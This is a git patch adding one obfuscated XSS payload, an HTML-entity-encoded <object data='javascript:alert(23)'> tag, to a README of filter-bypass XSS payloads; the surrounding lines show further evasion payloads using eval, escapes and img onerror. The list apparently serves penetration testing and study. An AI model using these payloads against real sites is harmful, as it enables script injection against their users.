From 7369ee28b31d84a2d895d6ec87cb154bb7994b74 Mon Sep 17 00:00:00 2001
From: Lorenzo Grazian <30753137+looCiprian@users.noreply.github.com>
Date: Thu, 2 Sep 2021 15:14:29 +0200
Subject: [PATCH] Added XSS <object> payload

---
 XSS Injection/README.md | 1 +
 1 file changed, 1 insertion(+)

diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index 92ccfa7..a1ae92c 100644
--- a/XSS Injection/README.md	
+++ b/XSS Injection/README.md	
@@ -191,6 +191,7 @@ Most tools are also suitable for blind XSS attacks:
 <script>\u0061lert('22')</script>
 <script>eval('\x61lert(\'33\')')</script>
 <script>eval(8680439..toString(30))(983801..toString(36))</script> //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm"
+<object/data="jav&#x61;sc&#x72;ipt&#x3a;al&#x65;rt&#x28;23&#x29;">
 
 // Img payload
 <img src=x onerror=alert('XSS');>